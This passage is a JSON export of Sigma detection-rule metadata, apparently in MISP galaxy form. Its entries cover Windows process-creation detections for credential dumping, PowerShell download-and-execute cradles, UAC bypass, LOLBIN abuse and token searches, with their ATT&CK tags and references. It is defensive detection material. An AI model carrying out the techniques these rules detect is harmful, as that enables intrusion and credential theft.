"https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b93a509-1cb8-42e1-97aa-ee24224cdc15", "value": "Sensitive File Dump Via Wbadmin.EXE" }, { "description": "Detects execution of \"odbcconf\" where the path of the DLL being registered is located in a potentially suspicious location.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_exec_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b65c28e-11f3-46cb-902a-68f2cafaf474", "value": "Odbcconf.EXE Suspicious DLL Location" }, { "description": "Detects the use of Replace.exe which can be used to replace file with another file", "meta": { "author": "frack113", "creation_date": "2022-03-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_replace.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", "value": "Replace.exe Usage" }, { "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", "meta": { "author": "Tim Rauch, Janantha Marasinghe, Elastic (original idea)", "creation_date": "2022-11-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "value": "Microsoft IIS Service Account Password Dumped" }, { "description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\n", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", "When cmd.exe and xcopy.exe are called directly", "When the command contains the keywords but not in the correct order" ], "filename": "proc_creation_win_susp_copy_system_dir.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", "value": "Suspicious Copy From or To System Directory" }, { "description": "Detects suspicious msiexec process starts with web addresses as parameter", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-02-09", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_msiexec_web_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "value": "MsiExec Web Install" }, { "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-02-06", "falsepositive": [ "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "filename": "proc_creation_win_gup_suspicious_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", "value": "Suspicious GUP Usage" }, { "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_priv_discovery.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml" ], "tags": [ "attack.privilege-escalation", "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", "value": "Security Privileges Enumeration Via Whoami.EXE" }, { "description": "Detects possible search for JWT tokens via CLI by looking for the string \"eyJ0eX\" or \"eyJhbG\".\nThis string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_jwt_token_search.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mrd0x.com/stealing-tokens-from-office-applications/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_jwt_token_search.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", "value": "Potentially Suspicious JWT Token Search Via CLI" }, { "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-14", "falsepositive": [ "Legitimate usage to restore snapshots", "Legitimate admin activity" ], "filename": "proc_creation_win_ntdsutil_susp_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" }, { "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\nAn example would be a threat actor creating a new user via the net command and providing the password inline\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-14", "falsepositive": [ "Legitimate usage of the passwords by users via commandline (should be discouraged)", "Other currently unknown false positives" ], "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "value": "Weak or Abused Passwords In CLI" }, { "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-28", "falsepositive": [ "Software installers that pull packages from remote systems and execute them" ], "filename": "proc_creation_win_powershell_susp_download_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", "value": "Suspicious PowerShell Download and Execute Pattern" }, { "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Admin activity" ], "filename": "proc_creation_win_cmd_assoc_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml" ], "tags": [ "attack.persistence", "attack.t1546.001" ] }, "related": [ { "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "value": "Change Default File Association Via Assoc" }, { "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", "meta": { "author": "Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "value": "Suspicious Rundll32 Execution With Image Extension" }, { "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_query_session_exfil.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" ], "tags": [ "attack.execution" ] }, "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", "value": "Query Usage To Exfil Data" }, { "description": "Detects PowerShell download and execution cradles.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-24", "falsepositive": [ "Some PowerShell installers were seen using similar combinations. Apply filters accordingly" ], "filename": "proc_creation_win_powershell_download_iex.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "value": "PowerShell Download and Execution Cradles" }, { "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", "meta": { "author": "Markus Neis", "creation_date": "2017-08-28", "falsepositive": [ "Legitimate use of SysInternals tools", "Programs that use the same command line flag" ], "filename": "proc_creation_win_sysinternals_eula_accepted.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/1008587936735035392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "value": "Potential Execution of Sysinternals Tools" }, { "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-25", "falsepositive": [ "Other legitimate \"Windows Terminal\" profiles" ], "filename": "proc_creation_win_windows_terminal_susp_children.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1550836225652686848", "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" ], "tags": [ "attack.execution", "attack.persistence" ] }, "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "value": "Suspicious WindowsTerminal Child Processes" }, { "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-04", "falsepositive": [ "False positives may occur with troubleshooting scripts" ], "filename": "proc_creation_win_powershell_set_service_disabled.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62b20d44-1546-4e61-afce-8e175eb9473c", "value": "Service StartupType Change Via PowerShell Set-Service" }, { "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", "meta": { "author": "frack113, Florian Roth (Nextron Systems), Josh Nickels", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_cli_obfuscation_unicode_img.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "584bca0f-3608-4402-80fd-4075ff6072e3", "value": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image" }, { "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-27", "falsepositive": [ "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "filename": "proc_creation_win_susp_download_office_domain.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1475085452784844803?s=12", "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], "tags": [ "attack.command-and-control", "attack.t1105", "attack.t1608" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "value": "Suspicious Download from Office Domain" }, { "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file which might contain a malicious action.", "meta": { "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the \".rsp\" file to determine if it is malicious and apply additional filters if necessary." ], "filename": "proc_creation_win_odbcconf_response_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f03babb-12db-4eec-8c82-7b4cb5580868", "value": "Response File Execution Via Odbcconf.EXE" }, { "description": "Detects usage of wmic to start or stop a service", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_service_manipulation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", "value": "Service Started/Stopped Via Wmic.EXE" }, { "description": "Detects PowerShell commands that decrypt an \".LNK\" \"file to drop the next stage of the malware.", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-30", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_decrypt_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml" ], "tags": [ "attack.execution" ] }, "uuid": "434c08ba-8406-4d15-8b24-782cb071a691", "value": "PowerShell Execution With Potential Decryption Capabilities" }, { "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_trufflesnout.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md", "https://github.com/dsnezhkov/TruffleSnout", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml" ], "tags": [ "attack.discovery", "attack.t1482" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "value": "HackTool - TruffleSnout Execution" }, { "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_computerdefaults.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", "value": "UAC Bypass Tools Using ComputerDefaults" }, { "description": "Detects potentially suspicious child processes launched via the ScreenConnect client service.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale", "creation_date": "2022-02-25", "falsepositive": [ "If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed." ], "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "value": "Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution" }, { "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_set_acl_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0944e002-e3f6-4eb5-bf69-3a3067b53d73", "value": "PowerShell Set-Acl On Windows Folder" }, { "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "filename": "proc_creation_win_lolbin_pester.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", "value": "Execute Code with Pester.bat as Parent" }, { "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", "meta": { "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "creation_date": "2020-10-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, 